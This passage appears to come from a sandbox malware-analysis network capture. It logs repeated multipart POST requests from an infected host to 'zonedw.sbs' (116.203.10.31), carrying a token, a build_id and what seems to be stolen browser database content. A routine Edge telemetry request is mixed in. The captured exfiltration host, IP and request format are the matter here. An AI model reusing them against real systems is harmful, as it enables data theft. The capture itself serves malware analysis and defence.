74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-12-13 17:58:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.7	50323	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:42 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----NOZUKFCT00ZUAAA1VKFU User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 Data Ascii: ------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------NOZUKFCT00ZUAAA1VKFUCont
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:42 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.7	50303	3.160.188.68	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:44 UTC	925	OUT	GET /b?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-13 17:58:45 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Fri, 13 Dec 2024 17:58:45 GMT Accept-CH: UA, Platform, Arch, Model, Mobile Location: /b2?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1F4cc13a9a06a09cf3ed6e51734112725; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1F4cc13a9a06a09cf3ed6e51734112725; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 X-Cache: Miss from cloudfront Via: 1.1 caebf714ea51c76c24bef1154a06d3a8.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MRS52-P5 X-Amz-Cf-Id: dK0yDAXUgLMmgDkDOQEZrqrAGczETyjHFnlafpaV-Iu6HTZdD8GeWg==

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.7	50333	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:45 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----7Q9HDT2D26FU379ZC2NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 48 44 54 32 44 32 36 46 55 33 37 39 5a 43 32 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------7Q9HDT2D26FU379ZC2NYContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------7Q9HDT2D26FU379ZC2NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------7Q9HDT2D26FU379ZC2NYCont
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-13 17:58:45 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 